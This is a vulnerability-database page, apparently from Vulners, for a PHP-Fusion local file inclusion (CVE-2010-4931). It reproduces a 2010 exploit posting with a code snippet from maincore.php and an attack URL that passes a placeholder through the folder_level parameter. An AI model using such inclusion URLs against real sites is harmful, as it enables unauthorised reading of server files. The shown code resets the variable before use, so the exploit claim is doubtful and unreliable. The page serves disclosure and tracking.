PHP-Fusion - Local File Inclusion
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2010-4931 | 9 Oct 201110:00 | – | cve | |
| CVE-2010-4931 | 9 Oct 201110:00 | – | cvelist | |
| CVE-2010-4931 | 9 Oct 201110:55 | – | nvd | |
| Directory traversal | 9 Oct 201110:55 | – | prion | |
| PT-2011-1866 · Php Fusion · Php-Fusion | 9 Oct 201100:00 | – | ptsecurity | |
| CVE-2010-4931 | 22 May 202501:34 | – | redhatcve |
# Exploit Title: PHP-Fusion Local File Includes Vulnerability
# Date: 2010/08/15
# Author: MoDaMeR
# Email: [email protected]
# My Sites : www.v4-team.com & www.hackteach.org
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Linux
# Team hacker:Mr.Mo0oM & Dr.xp
فلسطين كلنا فداءً لكِ
:::::::::::::::::::::::::
=================Exploit=================
maincore.php
[php]
// Locate config.php and set the basedir path
$folder_level = ""; $i = 0;
while (!file_exists($folder_level."config.php")) {
$folder_level .= "../"; $i++;
if ($i == 5) { die("Config file not found"); }
}
require_once $folder_level."config.php";
define("BASEDIR", $folder_level);
[/php]
----exploit----
http://{localhost}/{path}/maincore.php?folder_level=LFI
---------greatz----------
Greatz to :
aB0 m0h4mM3d , and all v4-team & hackteach membersData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Sep 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 210
EPSS0.16398